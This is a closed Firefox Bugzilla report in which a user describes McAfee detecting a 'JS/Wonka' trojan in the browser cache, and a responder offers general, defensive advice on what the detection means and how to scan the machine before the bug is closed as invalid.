Closed Bug 549063 Opened 15 years ago Closed 13 years ago

Mcafee identifies Trojan JS/Wonka inside my Mozilla Profile

Categories

(Firefox :: General, defect)

Product:
Firefox
Component:
General
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED INVALID

People

(Reporter: bawajose, Unassigned)

Details

(Whiteboard: [sg:needinfo])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729) Mcafee identifies Trojan JS/Wonka inside my Mozilla Profile... Path below C:\Documents and Settings\xxxxx\Local Settings\Application Data\Mozilla\Firefox\Profiles\iyh7who3.default\Cache The first time the trojan was identified was when I was just doing some searches in google. Though the trojan was quarantined and deleted, later on I found my mcafee firewall was disabled. So I had to do a system restore.. but even after that I see a DOS window suddenly opening while using mozilla (not immediately after I open the browser) and then my firewall is gone...! This I suppose has got something wrong with Mozilla or the mozilla addons. I had deleted the entire mozilla folder inside application data and then made a mozilla install again. I haven't seen the trojan back again till now. Please investigate to see if it is something wrong with Mozilla or its addons.. Reproducible: Always Steps to Reproduce: 1. You need to have mcafee virus scan enterprise, mozilla and all addons that I've installed. Can't say if you get the same trojan :-) 2. 3. Actual Results: trojan JS/Wonka inside C:\Documents and Settings\bj141f\Local Settings\Application Data\Mozilla\Firefox\Profiles\iyh7who3.default\Cache Expected Results: Mozilla to be secure none
A "javascript trojan" found in your browser cache doesn't mean you've been infected, it just means that script was on a page you visited. For any given identification you need to look it up to see if it's one that would affect your browser. In this case McAfee's link doesn't give much information http://vil.nai.com/vil/content/v_135834.htm Sounds like it's a pretty generic identification of a kind of obfuscated javascript whose purpose is to add an iframe that loads the actual attack. In other words not harmful in itself, but evidence of bad intent. The content of the attack frame could be anything, but most common these days are plugin exploits: http://www.krebsonsecurity.com/2010/02/blade-hacking-away-at-drive-by-downloads/ Seeing the DOS window open is a very very bad sign. Firefox doesn't do anything like that, but some kinds of malware do. The malware is unlikely to be hiding in Firefox itself, so clearing that out and reinstalling wouldn't get rid of it. Given your firewall being shut off repeatedly I would not trust the copy of McAfee running on your machine. Instead follow the "emergency procedures" for your anti-virus which usually include booting from a special disk that contains the scanning software. Unfortunately, unless you know what page gave you this nasty we're pretty much at a dead end.
Whiteboard: [sg:needinfo]
Thanks for your valuable suggestions. Yes I had to do a system restore every time I find my mcafee firewall disappears from my mcafee virus scan enterprise suite. Later I performed microsoft updates which was not happening though auto upadtes were turned ON. Uninstalled my mozilla, deleted all folders related to mozilla and then reinstalled it again.. yes but with a limited number of addons. I downloaded a copy of PC tools spyware doctor and ran a full scan which found nothing in my laptop. But after all these, I haven't seen the script executing again and I very often check whether my mcafee firewall is running. Fortunately or unfortunately, my VPN client will disconnect if a firewall doesn't run. This helps me know if some thing is going wrong with my firewall. Thanks for all your suggestion. Pls let me know if I could do some thing more. I could have done a clean install of xp if this is my personal laptop, but this is official and could not do much research on it. Thanks again (In reply to comment #1) > A "javascript trojan" found in your browser cache doesn't mean you've been > infected, it just means that script was on a page you visited. For any given > identification you need to look it up to see if it's one that would affect your > browser. In this case McAfee's link doesn't give much information > > http://vil.nai.com/vil/content/v_135834.htm > > Sounds like it's a pretty generic identification of a kind of obfuscated > javascript whose purpose is to add an iframe that loads the actual attack. In > other words not harmful in itself, but evidence of bad intent. The content of > the attack frame could be anything, but most common these days are plugin > exploits: > http://www.krebsonsecurity.com/2010/02/blade-hacking-away-at-drive-by-downloads/ > > Seeing the DOS window open is a very very bad sign. Firefox doesn't do anything > like that, but some kinds of malware do. The malware is unlikely to be hiding > in Firefox itself, so clearing that out and reinstalling wouldn't get rid of > it. Given your firewall being shut off repeatedly I would not trust the copy of > McAfee running on your machine. Instead follow the "emergency procedures" for > your anti-virus which usually include booting from a special disk that contains > the scanning software. > > Unfortunately, unless you know what page gave you this nasty we're pretty much > at a dead end.
I don't see any reason for this to remain hidden. We're certainly not going to get more info with this hidden.
Group: core-security
I do not see a bug inside of Mozilla code here. Closing as INVALID.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.